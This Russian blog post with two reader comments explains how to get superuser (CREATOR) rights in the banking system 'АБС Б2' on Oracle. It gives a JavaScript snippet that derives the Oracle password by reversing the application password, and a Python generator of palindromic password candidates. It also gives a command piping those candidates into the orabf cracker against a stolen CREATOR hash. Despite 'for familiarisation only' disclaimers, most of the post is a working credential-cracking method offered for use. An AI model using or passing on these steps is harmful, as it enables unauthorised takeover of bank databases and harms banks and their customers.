Продолжу тему ограничения прав доступа к АБС Б2. Поделюсь маленькими скриптами, которые значительно сократят время на получение прав доступа мегапользователя - CREATOR.
Вся информация предоставлена только для ознакомления, ни в коем случае не применять в жизни - карается законом!
Первым делом приложу javascript - преобразовывает пароль АБС Б2 в пароль к ORACLE.
var my_str = "parol_k_abs_b2"
var i = (my_str.length - 1);
for( var x = i; x >= 0; x-- ) {
document.write(my_str.charAt(x));
}
После преобразования, подключаемся к БД, выдираем hash пароля CREATOR (о чем речь, можно посмотреть в ранних статьях этого блога).
Теория: в БД минимальный пароль 6 символов - полный перебор паролей будет составлять 1 день, для подбора в 8 символов - полный перебор будет составлять около 2х недель (сроки приблизительные - все зависит от технических характеристик компьютера на котором осуществляется брутфорс).
Но взяв специфику использования паролей АБС Б2 для подключения к ORACLE нужно его преобразовывать. Как правило администраторы бывают очень ленивы, поэтому делают пароли-палиндромы, для использования одного запоминающегося пароля доступного для двух систем.
Исходный python скрипт для brutforce пароля, с учетом палиндромов:
sdict = '0 1 2 3 4 5 6 7 8 9 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z'.split()
sbase = '1 2 3 4'.split()
stemp = ''
def brut( s, n ):
for i in range( len( sdict ) ):
s[ n ] = sdict[ i ]
if n == 0:
tmp = stemp.join( s )
print( tmp + tmp[::-1] + '\n' )
else:
brut( s, n - 1 )
brut( sbase, len( sbase ) - 1 )
Запускаем получившийся скрипт в связке с наилучшим, на мой взгляд, подборщиком, который можно скачать на сайте http://toolcrypt.org
python brute.py | orabf полученный_хэш:creator -c -и за считанные секунды можно уже любоваться результатом труда.
Напоминаю данная статья носит только ознакомительный характер. Удачи в исследованиях.
Где скачать АБС Б2 ???
ОтветитьУдалитьАБС Б2 предоставляется непосредственно разработчиками при имплементации продукта в Банке.
ОтветитьУдалить